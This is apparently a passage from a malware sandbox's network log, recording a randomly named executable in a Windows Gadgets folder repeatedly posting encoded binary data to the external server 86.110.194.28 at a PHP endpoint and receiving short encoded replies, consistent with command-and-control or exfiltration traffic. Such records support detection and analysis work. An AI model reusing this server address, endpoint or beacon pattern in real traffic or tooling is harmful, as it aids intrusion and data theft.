                                                                                                                                                                  Data Ascii: [P[X]YUZT[YZ[RW\_TZ^RPP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&?![!9$S%<8A*;Z0$.%!5'& (0)0#+9#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:09.998667955 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:10.126106024 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:09 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  56 | 192.168.2.4 | 49876 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:08:10.281893015 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:10.629309893 CET | 2568 | OUT | Data Raw: 5b 56 5e 5e 5d 5e 50 5e 54 5b 59 5a 5b 57 57 5e 5f 56 5a 58 52 51 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^^]^P^T[YZ[WW^_VZXRQP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&E(6!0& E(;*3$.1? 4-Q ;0Y$4D'?#?#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:10.972764015 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:11.102176905 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:10 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  57 | 192.168.2.4 | 49882 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:08:11.225688934 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:11.582530022 CET | 2576 | OUT | Data Raw: 5b 5d 5b 5f 58 5a 55 5d 54 5b 59 5a 5b 55 57 5c 5f 51 5a 55 52 53 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [][_XZU]T[YZ[UW\_QZURSPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%)-56$W%0C)._3=Y&Y=!7!Q#0\0)$A$0S<#Y'$X.)
Jan 3, 2025 09:08:11.937881947 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:12.071604967 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:11 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 49891 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:12.195523977 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:12.900513887 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49896 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:12.994568110 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:13.684550047 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:13.816065073 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:13 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.4 | 49897 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:13.135226011 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:13.824251890 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:13.954063892 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:13 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.4 | 49902 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:14.089607000 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:08:14.791712999 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:14.929802895 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:14 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.4 | 49907 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:15.065152884 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:15.764836073 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:15.898154020 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:15 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.4 | 49912 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:16.023545027 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:16.704090118 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:16.834695101 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:16 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.4 | 49918 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:16.959903002 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:17.323982000 CET | 2576 | OUT | Data Raw: 5b 52 5e 59 58 58 55 5b 54 5b 59 5a 5b 53 57 52 5f 55 5a 5b 52 54 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [R^YXXU[T[YZ[SWR_UZ[RTP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(=!Z!:8R2?,A>;%3'*&9!B)T7]%97&?T<9#Y'$X.1
Jan 3, 2025 09:08:17.644254923 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:17.774085045 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:17 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 49926 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:17.896159887 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:18.254328012 CET | 2576 | OUT | Data Raw: 5e 57 5e 58 58 5f 50 5c 54 5b 59 5a 5b 52 57 58 5f 56 5a 59 52 5d 50 48 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^W^XX_P\T[YZ[RWX_VZYR]PH_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&@(-Z"9 V2?#=!0&%?>!$%P!(439/3<#+#Y'$X.5
Jan 3, 2025 09:08:18.578382015 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:18.706142902 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:18 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 49933 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:18.823206902 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:19.176282883 CET | 2164 | OUT | Data Raw: 5b 51 5e 5a 58 58 55 5a 54 5b 59 5a 5b 50 57 58 5f 53 5a 5d 52 54 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [Q^ZXXUZT[YZ[PWX_SZ]RTPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<.53%$=+=$$.'<&"T7^,]$4D0<8W+)#Y'$X.
Jan 3, 2025 09:08:19.513145924 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:19.642067909 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:19 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 27 01 32 02 32 5b 3e 59 2f 1d 31 33 21 59 22 56 2c 15 2f 0e 08 44 36 3f 35 59 32 38 3f 0f 3f 03 2e 41 3f 0d 00 0e 34 2d 25 56 3c 0a 28 5d 03 10 39 5c 3f 04 2f 5c 2a 00 2a 06 3a 37 0e 07 27 27 27 05 29 20 2d 56 32 2c 26 57 22 13 2c 0f 3e 0a 21 1d 24 02 3c 5b 2a 30 01 1d 27 17 20 54 0b 17 27 56 27 20 0d 58 26 38 04 02 2a 24 3b 05 27 39 21 50 35 12 00 57 37 00 38 5f 2c 1e 3e 0b 33 38 0f 52 29 2e 37 56 26 14 03 01 24 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '22[>Y/13!Y"V,/D6?5Y28??.A?4-%V<(]9\?/\**:7''') -V2,&W",>!$<[*0' T'V' X&8*$;'9!P5W78_,>38R).7V&$+.\#(U4WP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 49934 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:18.837618113 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:19.191797972 CET | 2576 | OUT | Data Raw: 5b 54 5e 5f 5d 5d 55 5b 54 5b 59 5a 5b 55 57 5b 5f 57 5a 58 52 51 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^_]]U[T[YZ[UW[_WZXRQPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%)>6*R1,,@*;'$*2<5V6B)7^7$ ';(#Y'$X.)
Jan 3, 2025 09:08:19.554965019 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 49940 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:19.773179054 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:08:20.130130053 CET | 2576 | OUT | Data Raw: 5b 5d 5e 58 58 56 50 5b 54 5b 59 5a 5b 5e 57 58 5f 50 5a 5a 52 56 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^XXVP[T[YZ[^WX_PZZRVPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D+2!'$,=+20-',6!! (0<$/;(#Y'$X.
Jan 3, 2025 09:08:20.480917931 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:20.618037939 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:20 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 49945 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:20.742124081 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:21.098361015 CET | 2576 | OUT | Data Raw: 5e 51 5b 5f 58 5c 50 51 54 5b 59 5a 5b 53 57 5e 5f 53 5a 5f 52 5c 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q[_X\PQT[YZ[SW^_SZ_R\PF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D+.-\")0%;*(2%49]1<!R6-U!+?')4A'0+)#Y'$X.1
Jan 3, 2025 09:08:21.415244102 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:21.541315079 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:21 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
